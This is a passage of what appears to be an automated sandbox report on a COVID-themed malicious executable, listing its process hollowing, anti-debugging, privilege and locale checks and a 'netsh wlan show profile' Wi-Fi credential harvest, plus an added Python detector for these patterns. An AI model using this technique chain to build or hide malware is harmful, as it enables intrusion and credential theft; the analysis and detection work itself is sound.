@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00405AFB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004057B6
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004011A3 mov eax, dword ptr fs:[00000030h] 28_2_004011A3
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665C1D8 LdrInitializeThunk, 33_2_0665C1D8
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 28_2_0040D477
Writes to foreign memory regions
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 410000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 415000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 416000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 83D008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile Jump to behavior
Source: dwnl.exe, 00000021.00000002.500313293.0000000002E73000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Managera\Local\Temp\dwnl.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: Program Manager1}
Source: dwnl.exe, 00000021.00000002.500150887.0000000002E2A000.00000004.00000001.sdmp Binary or memory string: Program Manager`i
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Manager|cmd|141v:November:Dec:De
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Manager|cmd|r:March:Apr:April:Ma
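
The Anti Debugging and HIPS / PFW / Operating System Protection Evasion sections above list the evidence as raw API chains, memory writes and child processes, but not how an analyst would match them in bulk. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own signature logic: a small Python matcher over lines in the report's own format that flags the RunPE ordering (CreateProcess, then WriteProcessMemory, then SetThreadContext, then ResumeThread), the MZ header (4D5A) written into the child at base 400000, the fs:[30h] PEB read, the DebugPort query, the SeDebugPrivilege adjustment, and the netsh wlan show profile / Test-Connection child processes. The sample lines are constructed to mirror the report's lines (plus one benign control line); the technique names and thresholds (two or more GetProcAddress calls, prefix matching on CreateProcess) are this example's own assumptions.

```python
"""Matcher for behaviour lines in the report's own format (added example).

Flags the anti-debugging and process-injection techniques the sections above
list as raw API chains: RunPE ordering, MZ header written into a child, the
fs:[30h] PEB read, DebugPort query, SeDebugPrivilege, and the netsh /
Test-Connection child processes. Sample lines are constructed to mirror the
report; technique names and thresholds are this example's own assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input, shaped like the report's lines (last one is a benign control).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 28_2_0040D477",
    r"Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38",
    r"Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004011A3 mov eax, dword ptr fs:[00000030h] 28_2_004011A3",
    r"Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process token adjusted: Debug Jump to behavior",
    r"Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 400000 value starts with: 4D5A Jump to behavior",
    r"Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 401000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile Jump to behavior",
    r"Source: C:\Users\user\Desktop\benign.exe Code function: 1_2_00401000 GetModuleHandleA,GetProcAddress,CreateProcessA,WaitForSingleObject, 1_2_00401000",
]

CODE_FUNC_RE = re.compile(r"^Source: (?P<src>.+?) Code function: (?P<fn>\S+) (?P<body>.*?) (?P=fn)$")
MEM_WRITTEN_RE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?P<rest>.*)$")
PROC_QUERIED_RE = re.compile(r"^Source: (?P<src>.+?) Process queried: (?P<what>\w+)")
TOKEN_RE = re.compile(r"^Source: (?P<src>.+?) Process token adjusted: (?P<priv>\w+)")
PROC_CREATED_RE = re.compile(r"^Source: (?P<src>.+?) Process created: (?P<rest>.*?)(?: Jump to behavior)?$")
PEB_RE = re.compile(r"fs:\[0*30h\]", re.I)  # fs:[30h] is the PEB on 32-bit Windows (BeingDebugged lives there)

# Prefix-matched API names, in the order a RunPE / process-hollowing loader calls them.
HOLLOWING_SEQUENCE = ("CreateProcess", "WriteProcessMemory", "SetThreadContext", "ResumeThread")


@dataclass(frozen=True)
class Finding:
    technique: str
    source: str    # image that performed the behaviour
    evidence: str  # function id, target/base, or command line


def api_calls(body: str) -> list[str]:
    """Split an 'A,B,C,' call chain into names; disassembly text (has spaces) yields []."""
    if " " in body.strip():
        return []
    return [c for c in body.split(",") if c]


def in_order(calls: list[str], wanted: tuple[str, ...]) -> bool:
    """True when every name in `wanted` occurs in `calls` in that relative order."""
    pos = 0
    for call in calls:
        if pos < len(wanted) and call.startswith(wanted[pos]):
            pos += 1
    return pos == len(wanted)


def analyze(lines: list[str]) -> list[Finding]:
    """Run every line through the matchers above and collect findings."""
    findings: list[Finding] = []
    for line in lines:
        line = line.rstrip()
        if m := CODE_FUNC_RE.match(line):
            src, fn, body = m["src"], m["fn"], m["body"]
            if PEB_RE.search(body):
                findings.append(Finding("peb-read-fs30", src, fn))
            calls = api_calls(body)
            if in_order(calls, HOLLOWING_SEQUENCE):
                findings.append(Finding("process-hollowing-api-chain", src, fn))
            # Repeated GetProcAddress after LoadLibrary/GetModuleHandle: imports resolved by hand.
            if calls.count("GetProcAddress") >= 2 and any(
                c.startswith(("LoadLibrary", "GetModuleHandle")) for c in calls
            ):
                findings.append(Finding("dynamic-api-resolution", src, fn))
        elif m := MEM_WRITTEN_RE.match(line):
            pe = "4D5A" in m["rest"].upper()  # 'MZ' header: a whole PE image is being mapped in
            technique = "pe-written-to-foreign-process" if pe else "foreign-memory-write"
            findings.append(Finding(technique, m["src"], f"{m['target']} @ {m['base']}"))
        elif m := PROC_QUERIED_RE.match(line):
            if m["what"] == "DebugPort":
                findings.append(Finding("debugport-query", m["src"], "DebugPort"))
        elif m := TOKEN_RE.match(line):
            if m["priv"] == "Debug":
                findings.append(Finding("debug-privilege-enabled", m["src"], "SeDebugPrivilege"))
        elif m := PROC_CREATED_RE.match(line):
            rest = m["rest"]
            if "netsh" in rest.lower() and re.search(r"wlan\s+show\s+profile", rest, re.I):
                findings.append(Finding("wlan-profile-harvest", m["src"], rest))
            if re.search(r"\bTest-Connection\b", rest, re.I):
                findings.append(Finding("connectivity-check-via-powershell", m["src"], rest))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per technique (the first thing a triage view shows)."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        image = f.source.rsplit("\\", 1)[-1]
        print(f"{f.technique:34} {image:45} {f.evidence[:70]}")
```

The ordered-subsequence check in in_order is what separates the hollowing chain from an ordinary launcher: the benign control line also calls CreateProcessA after GetProcAddress, but never writes into the child or touches its thread context, so it produces no finding. Prefix matching on CreateProcess covers the A/W variants; the 4D5A check distinguishes the write that drops a whole PE image at base 400000 from the follow-up section writes at 401000 and above.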

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z, 28_2_0040818A
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
